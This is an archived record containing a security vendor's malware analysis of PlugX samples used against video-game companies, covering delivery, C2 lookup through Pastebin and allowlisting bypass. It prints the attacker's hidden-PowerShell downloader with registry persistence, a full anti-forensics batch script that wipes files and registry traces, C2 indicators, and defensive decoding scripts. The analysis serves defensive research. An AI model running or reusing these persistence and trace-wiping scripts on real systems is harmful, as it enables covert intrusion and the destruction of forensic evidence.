{
	"id": "ea0b1e14-8b3b-4cb1-8975-45aaebe69bee",
	"created_at": "2026-04-06T00:09:21.818051Z",
	"updated_at": "2026-04-10T03:21:25.453576Z",
	"deleted_at": null,
	"sha1_hash": "b55a1b9004afc876f13ea36c12dd298dbffdf83d",
	"title": "Paranoid PlugX",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 470201,
	"plain_text": "Paranoid PlugX\r\nBy Tom Lancaster, Esmid Idrizovic\r\nPublished: 2017-06-27 · Archived: 2026-04-05 12:59:59 UTC\r\nThe PlugX malware has a long and extensive history of being used in intrusions as part of targeted attacks. PlugX is still\r\npopular today and its longevity is remarkable. The malware itself is well documented, with multiple excellent papers\r\ncovering most aspects of its functionality. Some of the best write-ups on the malware are cited below:\r\nTR-12 – Analysis of a PlugX malware variant used for targeted attacks. (Circl)\r\nAnalysis of a Recent PlugX Variant - \"P2P PlugX\" (JPCert)\r\nPlugX some uncovered points (Airbus)\r\nPlugX – The Next Generation (Sophos)\r\nGiven this wealth of information in the public domain, PlugX receives a lot of attention from security vendors who put\r\nefforts into providing detection mechanisms for it. Despite this, it remains a tool of choice for many attackers today,\r\nmeaning that if attackers are to be successful in using the malware, they must innovate in the delivery and installation of the\r\nmalware if they are to successfully infect their targets.\r\nThis article discusses a group of PlugX samples which we believe are all used by the same attacker(s), and the measures\r\nthey have taken to attempt to bypass security mechanisms. 
The targets of these attacks appear to primarily be companies in the video games industry, although other targets may exist outside of our telemetry.\r\nSpecifically, we discovered a series of samples using interesting techniques with respect to:\r\nResolution of an initial C2 address\r\nCombining PlugX with open source tools to initially load the malware\r\nAvoiding detection on disk\r\nPalo Alto Networks defends our customers against the samples discussed in this blog in the following ways:\r\nWildFire identifies all files mentioned in this article as Malicious.\r\nTraps 4.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code.\r\nPalo Alto Networks' AutoFocus customers can track samples related to this blog via the tag: ParanoidPlugX\r\nRelated IOCs are provided in Appendix A of this blog.\r\nAn RTF, an MSI file, a .NET Wrapper and two stages of Shellcode walk into a bar...\r\nOur journey begins with an RTF file named \"New Salary Structure 2017.doc\", which exploits CVE-2017-0199. The mechanics of this exploit are already well covered, and as such do not require further discussion here. The document reaches out to download its initial payload from the following URL:\r\nhxxp://172.104.65[.]97/Office.rtf\r\nThis is a downloader script which attempts to download and execute two payloads; the code is shown below:\r\n\u003cscript\u003e\r\na=new ActiveXObject(\"WScript.Shell\");\r\na.run('%windir%\\\\System32\\\\reg.exe add HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v MSASCuiL2 /t reg_s\r\na.run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -WindowStyle hidden -ep bypass -enc\r\nJABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC\r\n0);window.close();\r\n\u003c/script\u003e\r\nThe first payload is a Windows Installer (MSI) file, and dynamic analysis of this file piqued our interest. 
We could see the malware was PlugX from its actions, yet the C2 address was a pastebin.com URL. Looking at the Pastebin post we expected to immediately identify a block of text which would later decode to a C2 address, but glancing at the returned content we were unable to immediately identify the C2.\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 1 of 12\n\nThe second file is a PowerShell script which appears to be based on a Rapid7 Ruby exploitation script that loads arbitrary shellcode. In this case, the shellcode is a copy of PlugX and is the same shellcode contained in the MSI file that we dissect below.\r\n.NET Wrapper\r\nThe main payload is delivered in a Microsoft .NET Framework file within the previously mentioned MSI file. When executed, the .NET Framework wrapper will first check whether VMware Tools is running in the background; this is done via a simple process check, searching for any process named \"vmtoolsd\". Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name 'MSASCuiLTasks' in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. This registry key causes the malware to run again each time the system reboots. Next, it will copy the first stage shellcode into memory and create a new thread with the shellcode running in it; the code responsible for this execution is shown in Figure 1. The shellcode is not encrypted but is obfuscated.\r\nFigure 1 - The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread.\r\nThe first shellcode decrypts a further shellcode block. This second shellcode block, in turn, will unpack the main PlugX DLL in memory using RtlDecompressBuffer. 
As is typical for PlugX, the header of the final DLL is missing its magic DOS and NT image headers, which are replaced with XV instead of MZ and PE as shown in Figure 2.\r\nFigure 2 – The decoded DLL payload using the wrong header, XV instead of MZ/PE.\r\nFinally, the second shellcode block will resolve the imports and relocations and jump to the entry point of the DLL.\r\nEncrypted Configuration in shellcode\r\nThe configuration information for the malware, including the C2 information, is encrypted in the first shellcode blob and is passed as an argument to the DllMain function of the main PlugX DLL. The DLL itself also contains a default configuration to connect to localhost on port 12345. This means that if you extract the DLL manually and execute it, it will connect to localhost:12345 rather than the real C2 server, which was passed as an initial argument to the DLL by the first shellcode.\r\nDecrypting the Configuration\r\nAs previously mentioned, the real configuration data is stored in the first stage shellcode, but it is not stored in cleartext; it is encrypted and compressed. The configuration data is encrypted with the same algorithm described previously by JPCert, but using different XOR values. The versions discussed in the JPCert blog post used 20140918 and 353, while the versions we examined use XOR values of 20141118 and 8389. The same decryption routine is also used for any other string obfuscation or file encryption as required by this sample of PlugX. After decrypting the strings, they must be further decompressed using LZNT1. For that we can use a Python script, included in Appendix B – Python Scripts.\r\nAfter decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration. 
For example, we can see it will inject itself into one of these three processes:\r\n%ProgramFiles(x86)%\\Sophos\\AutoUpdate\\ALUpdate.exe\r\n%ProgramFiles(x86)%\\Common Files\\Java\\Java Update\\jusched.exe\r\n%ProgramFiles(x86)%\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\r\nThe attempt to inject itself into a process belonging to an antivirus product suite is particularly bold.\r\nIn addition to this, the malware queries four Pastebin links to extract the C2 addresses from them:\r\nhttps://pastebin[.]com/eSsjmhBG\r\nhttps://pastebin[.]com/PSxQd6qw\r\nhttps://pastebin[.]com/CzjM9qwi\r\nhttps://pastebin[.]com/xHDSxxMD\r\nA full list of the extracted strings from the configuration is given in Appendix D – Extracted PlugX Strings.\r\nExtracting C2\r\nPlugX has a feature to extract encrypted C2 configurations from a given URL. In this case, the attackers were creative in hiding the string in a seemingly legitimate block of text. An example of the content retrieved from Pastebin is given below:\r\n---- BEGIN SSH2 PUBLIC KEY ----\r\nComment: \"rsa-key\"\r\nAAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd\r\n8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3\r\n/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps\r\n8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE\r\n2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=\r\n---- END SSH2 PUBLIC KEY ----\r\nAt first glance we missed it, but the paste uses the same technique discussed in this Airbus post. It parses the \"RSA key\" looking for the magic values \"DZKS\" and \"DZJS\". 
It then reads and decrypts the content between these two markers (the DZKS...DZJS segment in the key block above) to yield an IP address.\r\nA Python script to decode strings encrypted with this technique is given in Appendix B – Python Scripts.\r\nAn overview of the whole execution flow for this sample is given in Figure 3.\r\nFigure 3 - An overview of the execution flow for this sample.\r\nIn all, the attackers have chained together many disparate pieces of code, both custom and open source, all in order to load PlugX. Given the number of components, this would have taken a reasonable amount of time and indicates their dedication to evading detection whilst continuing to use the same malware.\r\nPivoting to other PlugX samples\r\nBased on our findings above, we identified other examples of interesting PlugX samples. These other examples were identified based on similar samples that were sent to the targeted organizations, infrastructure used by the attackers, as well as unique delivery mechanisms for samples.\r\nParanoid PlugX\r\nOne related series of PlugX samples we examined appeared to be particularly \"paranoid\" about being detected on disk, and so takes specific anti-forensics steps to avoid being detected on the disk. 
One example of these samples is given below:\r\nSHA256: 6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb\r\nThe file is a self-extracting RAR, which is a common delivery mechanism for PlugX, particularly when the eventual payload will be sideloaded by a legitimate executable. In that respect this case is no different, as the eventual payload is executed by a legitimate signed Microsoft binary which loads the DLL \"BlackBox.dll\". However, in order to kick off the execution of the malware the attacker uses a batch script which executes the malware, and the batch script does more than simply initiate execution of the malware. After running the malware, the batch script goes on to clean up all signs of its existence on the system; this includes:\r\nDeletion of all initial files created during installation, as well as all associated files required on disk during initial execution.\r\nDeletion of all registry keys associated with the extraction of the SFX RAR\r\nDeletion of the UserAssist key entries related to applications that have been recently executed\r\nDeletion of all registry keys relating to services that have recently run\r\nClearly the attacker using this PlugX is paranoid about it being detected on disk, both in the registry and the file system. To top this off, the script runs most of the deletion commands more than once.\r\nThe result is that there should be no evidence on disk that the malware was ever executed, making it harder for forensics teams to identify how the malware got there, and meaning that memory or network based detection would be required to identify the intrusion. 
The full contents of the batch script are given in Appendix C – a.bat.\r\nThe power of open source \u0026 PlugX\r\nIn the first half of 2017, we saw attackers begin to improve upon this \"Paranoid\" version of PlugX – it wasn't enough to be memory-only after infecting the system; the attackers also wanted to bypass application allowlisting techniques in use by network defenders. To this end, they began incorporating open source techniques, in particular those that have been assembled in a list authored by the GitHub user SubTee. For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques:\r\nSHA256: 822b313315138a69fc3e3f270f427c02c4215088c214dfaf8ecb460a5418c5f3\r\nThis sample approximately follows the GIST published here, but has additional code which appears to be custom to our attacker and acts as a helper to load the shellcode. The shellcode is, as in our first example, another PlugX payload.\r\nIn another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application allowlist bypass file:\r\nSHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2\r\nThis time the attacker didn't have to write any of their own code; instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application.\r\nConclusions \u0026 Mitigations\r\nWhile PlugX has been well understood by the security community for years, attackers continue to use the malware. 
Some possible reasons for this continued use include:\r\nThe operators of the malware are familiar and comfortable with the existing malware, meaning they are reluctant to change.\r\nThough competent at packaging PlugX in different ways, the attackers would struggle to write fully featured malware like PlugX.\r\nThe effort required to rebuild malware as complex as PlugX is not worthwhile when they can bypass defenses without doing so.\r\nIn all likelihood, a combination of these three factors is behind the continued prevalence of the malware. Many PlugX attackers continue to use relatively mundane techniques to load the malware, making it easy for defenders to identify and prevent execution of the malware, but others continue to apply new and interesting techniques to evade detection.\r\nIn particular, this set of attackers has made good use of open source tools to package the malware, and shows some skill in writing their own wrapper applications to execute payloads. Many in the security industry would be quick to recommend application whitelisting as one of the most effective ways to reduce the success rate of attacks; however, by applying publicly available techniques it is possible to bypass these controls.\r\nFor organizations relying on Application Whitelisting, SubTee's blog makes a series of recommendations which help prevent these bypass techniques. 
In addition to these mitigations, Traps 4.0 can be configured to protect the .NET processes which can be abused in this manner.\r\nAppendix A - Related IoCs\r\nDirectly related:\r\n45.248.84[.]7\r\n172.104.65[.]97\r\nhttps://pastebin[.]com/eSsjmhBG\r\nhttps://pastebin[.]com/PSxQd6qw\r\nhttps://pastebin[.]com/CzjM9qwi\r\nhttps://pastebin[.]com/xHDSxxMD\r\nInferred relation via similar targeting\r\nDomains:\r\nAppendix B – Python Scripts\r\nLZNT1 decompression script (only works on Windows, as it calls RtlDecompressBuffer in ntdll directly):\r\nfrom ctypes import windll, create_string_buffer, c_ulong, byref\r\n\r\n# Read the decrypted, still LZNT1-compressed configuration blob\r\nwith open('mysettings.bin', 'rb') as f:\r\n    buffer = f.read()\r\n# Generous upper bound for the decompressed size\r\nuncompressed_size = len(buffer) * 16\r\nuncompressed = create_string_buffer(uncompressed_size)\r\nFinalUncompressedSize = c_ulong(0)\r\nnt = windll.ntdll\r\n# COMPRESSION_FORMAT_LZNT1 = 2\r\nres = nt.RtlDecompressBuffer(2, uncompressed, uncompressed_size, buffer, len(buffer), byref(FinalUncompressedSize))\r\nif res == 0:  # STATUS_SUCCESS\r\n    uncompressed = uncompressed[0:FinalUncompressedSize.value]\r\nDecoding the PlugX configuration:\r\nimport struct\r\n\r\ndef plugx_decode(data):\r\n    # The first DWORD of the blob seeds both running keys; the remainder is the ciphertext\r\n    decode_key = struct.unpack_from('\u003cI', data, 0)[0]\r\n    out = bytearray()\r\n    # XOR values might possibly be varied (the JPCert samples used 20140918 and 353).\r\n    key1 = decode_key ^ 20141118\r\n    key2 = decode_key ^ 8389\r\n    for c in data[4:]:\r\n        # ADD/SUB values might possibly be varied.\r\n        key1 += 3373\r\n        key2 -= 39779\r\n        dec = c ^ (((key2 \u003e\u003e 16) \u0026 0xff ^ ((key2 \u0026 0xff ^ (((key1 \u003e\u003e 16) \u0026 0xff ^ (key1 - (key1 \u003e\u003e 8) \u0026 0xff)) - (key1 \u003e\u003e 24) \u0026 0xff)) - (key2 \u003e\u003e 8) \u0026 0xff)) - (key2 \u003e\u003e 24) \u0026 0xff)\r\n        out.append(dec)\r\n    return bytes(out)\r\nDecoding the C2 addresses from Pastebin:\r\nimport struct\r\n\r\ndef decode(buf):\r\n    # Each byte is encoded as two letters: the first carries the low nibble, the second the high nibble, each offset by 'A' (0x41)\r\n    res = bytearray()\r\n    for i in range(0, len(buf) - 1, 2):\r\n        dl = ord(buf[i + 1])\r\n        dl = dl - 0x41\r\n        dl = dl * 0x10\r\n        dl = dl + ord(buf[i])\r\n        dl = dl - 0x41\r\n        res.append(dl)\r\n    return bytes(res)\r\n\r\ndef decode_plugx_pastebin(buf):\r\n    # The C2 record is the text between the DZKS and DZJS markers inside the fake SSH2 key\r\n    start = buf.find('DZKS')\r\n    if start == -1:\r\n        return None\r\n    end = buf.find('DZJS', start + 4)\r\n    if end == -1:\r\n        return None\r\n    start += 4\r\n    data = buf[start:end]\r\n    decoded = decode(data)\r\n    # Layout of the decoded record: WORD connection type, WORD port, then the C2 address as ASCII\r\n    connection_type = struct.unpack_from('\u003cH', decoded, 0)[0]\r\n    port = struct.unpack_from('\u003cH', decoded, 2)[0]\r\n    ip = decoded[4:].decode('ascii', errors='replace')\r\n    print(\"Decoded IP: {}:{}, type: {}\".format(ip, port, connection_type))\r\n    return ip, port, connection_type\r\n\r\n# Body of the Pastebin post shown above; the original script ran this for each of the four pastes.\r\npaste = ('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd'\r\n         '8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3'\r\n         '/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps'\r\n         '8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE'\r\n         '2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=')\r\ndecode_plugx_pastebin(paste)\r\nAppendix C – 
a.bat\r\nmscorsvw.exe\r\ncscript del.vbs\r\ndel BlackBox.dll\r\ndel mscorsvw.exe\r\ndel BlackBox\r\ndel explorer.exe\r\ncscript del.vbs\r\ndel %sfxcmd%\r\ndel mscorsvw.exe\r\ndel BlackBox.dll\r\ndel BlackBox\r\ndel explorer.exe\r\ndel del.vbs\r\ndel a.bat\r\ndel %sfxcmd%\r\ndel mscorsvw.exe\r\ndel BlackBox.dll\r\ndel BlackBox\r\ndel explorer.exe\r\ndel del.vbs\r\ndel a.bat\r\nreg delete \"HKLM\\SYSTEM\\ControlSet001\\services\\emproxy\" /f\r\nreg delete \"HKLM\\SYSTEM\\ControlSet002\\services\\emproxy\" /f\r\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\services\\emproxy\" /f\r\nreg delete \"HKLM\\SYSTEM\\ControlSet001\\services\\EmpPrx\" /f\r\nreg delete \"HKLM\\SYSTEM\\ControlSet002\\services\\EmpPrx\" /f\r\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\services\\EmpPrx\" /f\r\nreg delete \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\svchost_RASAPI32\" /f\r\nreg delete \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\svchost_RASMANCS\" /f\r\nreg delete \"HKU\\.DEFAULT\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\" /f\r\ndel /s c:\\windows\\temp\\*.bat\r\ndel /s c:\\windows\\temp\\*.dat\r\ndel /s c:\\windows\\temp\\*.dll\r\ndel /s c:\\windows\\temp\\*.exe\r\ndel /s c:\\windows\\temp\\*.vbs\r\ndel %0\r\nAppendix D – PlugX Extracted strings\r\nhttps//pastebin.com/eSsjmhBG\r\nhttps://pastebin.com/PSxQd6qw\r\nhttps://pastebin.com/CzjM9qwi\r\nhttps://pastebin.com/xHDSxxMD\r\n%ProgramData%\\arm2sv1k\r\nDSSM\r\nDSSM\r\nMicrosoft Office Document Update Utility\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\r\nJmLI\r\n%ProgramFiles(x86)%\\Sophos\\AutoUpdate\\ALUpdate.exe\r\n%ProgramFiles(x86)%\\Common Files\\Java\\Java Update\\jusched.exe\r\n%ProgramFiles(x86)%\\Common 
Files\\Adobe\\ARM\\1.0\\armsvc.exe\r\n%windir%\\system32\\FlashPlayerApp.exe\r\nslax\r\npastebin\r\nmahTszuBzqwUTcGt\r\n%ProgramData%\\arm2sv1k\\Akgcl\r\nSource: https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/"
	],
	"report_names": [
		"unit42-paranoid-plugx"
	],
	"threat_actors": [],
	"ts_created_at": 1775434161,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
